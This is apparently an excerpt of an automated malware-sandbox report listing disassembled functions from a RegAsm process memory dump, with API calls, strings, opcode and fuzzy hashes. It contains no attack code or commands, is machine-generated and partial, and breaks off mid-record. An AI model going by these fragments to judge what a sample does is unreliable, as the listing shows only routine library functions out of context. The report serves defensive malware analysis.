                                                        • Opcode ID: ced2df2ca1e90e10fa071957dcb098623f3e3a809bb2d024f11cac2cf43cd846
                                                        • Instruction ID: 19bc9a5faa58905eeb349e38e191dc46f90ae1201473c1bbfe65ceca24ef9126
                                                        • Opcode Fuzzy Hash: ced2df2ca1e90e10fa071957dcb098623f3e3a809bb2d024f11cac2cf43cd846
                                                        • Instruction Fuzzy Hash: AE116632B0164987EB009F1889512EEB7F9DF8620CB119129DC08AB602EB30AA84C382
                                                        Function 6C0DCA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.MOZGLUE(?), ref: 6C0DCA26
                                                          • Part of subcall function 6C0DCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C0DCB49
                                                          • Part of subcall function 6C0DCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C0DCBB6
                                                        • mozalloc_abort.MOZGLUE(?), ref: 6C0DCAA2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeavemallocmozalloc_abort
                                                        • String ID: d
                                                        • API String ID: 3517139297-2564639436
                                                        • Opcode ID: 998a08a711a50063b212c41d66af58bb7aeb5feca133827cb26b92da7118e539
                                                        • Instruction ID: 71f2c5bc6bc1089dae1140989280f7ab6f84a4a6c3ad36c4334eadc9eed85b60
                                                        • Opcode Fuzzy Hash: 998a08a711a50063b212c41d66af58bb7aeb5feca133827cb26b92da7118e539
                                                        • Instruction Fuzzy Hash: 4B110821E1479897DB01EB6CC8105FDB7B5EF9621CB469359DC4997612FB70B5C4C380
                                                        Function 6C103CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C103D19
                                                        • mozalloc_abort.MOZGLUE(?), ref: 6C103D6C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: _errnomozalloc_abort
                                                        • String ID: d
                                                        • API String ID: 3471241338-2564639436
                                                        • Opcode ID: 33b8d9f28a7a4a3d8a0551a8955771fedbc40185ba47686257d1aa8b3ea65938
                                                        • Instruction ID: ebe7eef879f5e6d8ae1ace420a8b74974331f34e3e369c79475f391426dcd6e5
                                                        • Opcode Fuzzy Hash: 33b8d9f28a7a4a3d8a0551a8955771fedbc40185ba47686257d1aa8b3ea65938
                                                        • Instruction Fuzzy Hash: ED11C135F046889BDB01EF69C8149EDB775EF9A318BC58218EC499B602FF30A585D790
                                                        Function 6C0E1A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • realloc.MOZGLUE(?,?), ref: 6C0E1A6B
                                                          • Part of subcall function 6C0E1AF0: EnterCriticalSection.KERNEL32(?), ref: 6C0E1C36
                                                        • mozalloc_abort.MOZGLUE(?), ref: 6C0E1AE7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalEnterSectionmozalloc_abortrealloc
                                                        • String ID: d
                                                        • API String ID: 2670432147-2564639436
                                                        • Opcode ID: 26a55f7114994c75a94b13ef1a85d0b733e47cf4e7433def05b0acd57cfa2f6a
                                                        • Instruction ID: 142b0420b8728b3a6e4cd3f65cff05264c2a0badf783c56322e823ac56ff2cff
                                                        • Opcode Fuzzy Hash: 26a55f7114994c75a94b13ef1a85d0b733e47cf4e7433def05b0acd57cfa2f6a
                                                        • Instruction Fuzzy Hash: 94110232E106589BDB04DBA8C8145FEB7B5EF89218F498619ED496B612EB70E6C4C380
                                                        Function 6C0D4730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0D44B2,6C14E21C,6C14F7F8), ref: 6C0D473E
                                                        • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C0D474A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: GetNtLoaderAPI
                                                        • API String ID: 1646373207-1628273567
                                                        • Opcode ID: 5795c030fc47c4a0cc508152a2e152f228209249fa1bae6b0cd932943da54d62
                                                        • Instruction ID: 322f409507e177cbc4df2923b48fc7612f91651038b8e296248a7c80a82a2c8a
                                                        • Opcode Fuzzy Hash: 5795c030fc47c4a0cc508152a2e152f228209249fa1bae6b0cd932943da54d62
                                                        • Instruction Fuzzy Hash: FF0192757003149FDF00AFA58454A1D7BF9EF8B359B458069E909DB300DB74E9019F91
                                                        Function 6C126DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C126E22
                                                        • __Init_thread_footer.LIBCMT ref: 6C126E3F
                                                        Strings
                                                        • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C126E1D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footergetenv
                                                        • String ID: MOZ_DISABLE_WALKTHESTACK
                                                        • API String ID: 1472356752-1153589363
                                                        • Opcode ID: 11efb80b513428cb3a25f11249a1bc831f29f87a13faeaf4f1c3a18c4b25b5b2
                                                        • Instruction ID: 72627e1f526f5c4541ae0a49b0176338a356f918926ae03f29fe672c23c4c140
                                                        • Opcode Fuzzy Hash: 11efb80b513428cb3a25f11249a1bc831f29f87a13faeaf4f1c3a18c4b25b5b2
                                                        • Instruction Fuzzy Hash: 06F05939204284CBDB00EBA8C854A927372D72331CF148165CC2047BD1D728B597DE93
                                                        Function 6C0D9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D9EEF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer
                                                        • String ID: Infinity$NaN
                                                        • API String ID: 1385522511-4285296124
                                                        • Opcode ID: ff207f227c96e278ae20112d6497d4ade7c7ee86c8b8c4d4c23d44b008c9e18a
                                                        • Instruction ID: 032100d5d1ade14059b3fced8ceed0f2f0e7bbe429bea09d3ec0854cd678f26d
                                                        • Opcode Fuzzy Hash: ff207f227c96e278ae20112d6497d4ade7c7ee86c8b8c4d4c23d44b008c9e18a
                                                        • Instruction Fuzzy Hash: 3CF0A971600342CADB10AF58EA59B8233B2E70331DF20CA68C9340BB41D7357596EA82
                                                        Function 6C125900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C1451C8), ref: 6C12591A
                                                        • CloseHandle.KERNEL32(FFFFFFFF), ref: 6C12592B
                                                        Strings
                                                        • MOZ_SKELETON_UI_RESTARTING, xrefs: 6C125915
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CloseEnvironmentHandleVariable
                                                        • String ID: MOZ_SKELETON_UI_RESTARTING
                                                        • API String ID: 297244470-335682676
                                                        • Opcode ID: c4e64864093e4b6a5627850f724b633748aa3c500db16415e76985ae33972ad4
                                                        • Instruction ID: 8a1a25d25401c0c43ce735c5d23337441c5fdecb4e94e6757d150e2e95e87dda
                                                        • Opcode Fuzzy Hash: c4e64864093e4b6a5627850f724b633748aa3c500db16415e76985ae33972ad4
                                                        • Instruction Fuzzy Hash: D0E0DF70204640FBDF00AB68C98CB497FF89B2372DF10C504E56893AC2C3B9A880A791
                                                        Function 6C0DBED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C0DBEE3
                                                        • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C0DBEF5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$CallsDisableLoadThread
                                                        • String ID: cryptbase.dll
                                                        • API String ID: 4137859361-1262567842
                                                        • Opcode ID: d80b2b41d8894874109af9d5c172c86a6d1e3d33537643ab80cd3d23e706d0a3
                                                        • Instruction ID: 7c9c08b14fb843d02524b88a03fc59c86e0ca48ffdc1d76caf01fd6dc3e93b32
                                                        • Opcode Fuzzy Hash: d80b2b41d8894874109af9d5c172c86a6d1e3d33537643ab80cd3d23e706d0a3
                                                        • Instruction Fuzzy Hash: F2D0C932284608EADA44BBA48D0AF2D3BF8A742729F50C025F755A5951C7B1A451DB94
                                                        Function 6C0C50E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0C4E9C,?,?,?,?,?), ref: 6C0C510A
                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0C4E9C,?,?,?,?,?), ref: 6C0C5167
                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C0C5196
                                                        • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C0C4E9C), ref: 6C0C5234
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memcpy
                                                        • String ID:
                                                        • API String ID: 3510742995-0
                                                        • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                        • Instruction ID: cb0f06306a0d831b3cd4d69841a563f03983ad7d8a8d28a84baa257e9c0331fa
                                                        • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                        • Instruction Fuzzy Hash: D5918D79605616CFCB15CF08C890A5ABBE1FF99318B288688EC589B715D771FC42CBE1
                                                        Function 6C1008F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C14E7DC), ref: 6C100918
                                                        • LeaveCriticalSection.KERNEL32(6C14E7DC), ref: 6C1009A6
                                                        • EnterCriticalSection.KERNEL32(6C14E7DC,?,00000000), ref: 6C1009F3
                                                        • LeaveCriticalSection.KERNEL32(6C14E7DC), ref: 6C100ACB
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3168844106-0
                                                        • Opcode ID: cdea691b9818be6a1669c3d4ee3755ebfe37129ba957f025170a72dcc8753531
                                                        • Instruction ID: 43807701e1a17af58f31eed5d813840b994af6158d34b664603ac46581733a8d
                                                        • Opcode Fuzzy Hash: cdea691b9818be6a1669c3d4ee3755ebfe37129ba957f025170a72dcc8753531
                                                        • Instruction Fuzzy Hash: 9051F736701A50CBEB04EE15C415B6A73B1EBC6B38B25C13ADD6997F80DF31A94286D0
                                                        Function 6C1259C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C0FE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C125A47
                                                        • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C0FE56A,?,|UrlbarCSSSpan), ref: 6C125A5C
                                                        • free.MOZGLUE(?), ref: 6C125A97
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C125B9D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$mallocmemset
                                                        • String ID:
                                                        • API String ID: 2682772760-0
                                                        • Opcode ID: 0fcfc87b2a5d55246a4a1bd08f557d79d0100e5b27f94b97f0f17e2170c9124a
                                                        • Instruction ID: 675f212aa3fa7bb03e794364662afee6fc826189c7f78cd01ea3c5a0ed54b8eb
                                                        • Opcode Fuzzy Hash: 0fcfc87b2a5d55246a4a1bd08f557d79d0100e5b27f94b97f0f17e2170c9124a
                                                        • Instruction Fuzzy Hash: AF516D746087409FD700CF29C8C171ABBE5EF99318F04C96DE8899B746D778E984CB62
                                                        Function 6C11B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C11B2C9,?,?,?,6C11B127,?,?,?,?,?,?,?,?,?,6C11AE52), ref: 6C11B628
                                                          • Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C1190FF
                                                          • Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C119108
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C11B2C9,?,?,?,6C11B127,?,?,?,?,?,?,?,?,?,6C11AE52), ref: 6C11B67D
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C11B2C9,?,?,?,6C11B127,?,?,?,?,?,?,?,?,?,6C11AE52), ref: 6C11B708
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C11B127,?,?,?,?,?,?,?,?), ref: 6C11B74D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: freemalloc
                                                        • String ID:
                                                        • API String ID: 3061335427-0
                                                        • Opcode ID: 44d003b178127ed9b9bffe0d2d68309168d128035f338d03570d7c8bf6d7d8c3
                                                        • Instruction ID: 9ff1dbf0ee451daf8ff27eacac24456e7d7b45163d06a44696b7434efe5e0304
                                                        • Opcode Fuzzy Hash: 44d003b178127ed9b9bffe0d2d68309168d128035f338d03570d7c8bf6d7d8c3
                                                        • Instruction Fuzzy Hash: 4B51FFB1A092168FEB14CF18C99076EB7B5FF85304F46853DC95AABB40D739E805CBA1
                                                        Function 6C11DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C10FF2A), ref: 6C11DFFD
                                                          • Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C1190FF
                                                          • Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C119108
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C10FF2A), ref: 6C11E04A
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C10FF2A), ref: 6C11E0C0
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C10FF2A), ref: 6C11E0FE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: freemalloc
                                                        • String ID:
                                                        • API String ID: 3061335427-0
                                                        • Opcode ID: c0a061235e84ca7eb318e1547191881222fe5ffe84bc929cdf9866de6d5adcd3
                                                        • Instruction ID: f7e94c615685a208bb54b2ca3eb6f9f1a69095aac557215e7cdeaaaa9bdd4bf0
                                                        • Opcode Fuzzy Hash: c0a061235e84ca7eb318e1547191881222fe5ffe84bc929cdf9866de6d5adcd3
                                                        • Instruction Fuzzy Hash: DD41D4B57082168FEB14CFA8C89435A73B6BF46308F154539D616DBF40E73AEA04CB92
                                                        Function 6C126180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C1261DD
                                                        • memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C12622C
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C126250
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C126292
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: malloc$freememcpy
                                                        • String ID:
                                                        • API String ID: 4259248891-0
                                                        • Opcode ID: 5508354fed918f5d5f643f39b5981d428872f3bec705c4e5fd93084601418ded
                                                        • Instruction ID: 6ea5badde2b8507c699afb382bb095743f51d54df6d0f53b33c493c1d0581580
                                                        • Opcode Fuzzy Hash: 5508354fed918f5d5f643f39b5981d428872f3bec705c4e5fd93084601418ded
                                                        • Instruction Fuzzy Hash: 60313575A0060E8FDB04DF2CD881BAA73E9FFA5308F108239C55AD7691EB35E598CB50
                                                        Function 6C116E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C116EAB
                                                        • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C116EFA
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C116F1E
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C116F5C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: malloc$freememcpy
                                                        • String ID:
                                                        • API String ID: 4259248891-0
                                                        • Opcode ID: bfcc1c91ce986aa001353478edae88dda523a245a13d9036cb2228fc83c15472
                                                        • Instruction ID: b0c35c906f925e5137ee8aefe68caf42631233ea8b93487f12923713f7d2db25
                                                        • Opcode Fuzzy Hash: bfcc1c91ce986aa001353478edae88dda523a245a13d9036cb2228fc83c15472
                                                        • Instruction Fuzzy Hash: E331F671A1460A8FDB04CF2CC9906AE73E9EB95304F50827DD41AC7A51EF36E659CB90
                                                        Function 6C12B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C0D0A4D), ref: 6C12B5EA
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C0D0A4D), ref: 6C12B623
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C0D0A4D), ref: 6C12B66C
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C0D0A4D), ref: 6C12B67F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: malloc$free
                                                        • String ID:
                                                        • API String ID: 1480856625-0
                                                        • Opcode ID: 0c78bcedb3a636b3296a1999f4eef0ff30d8856bb4ed3d6428b6e77f8e4abe5c
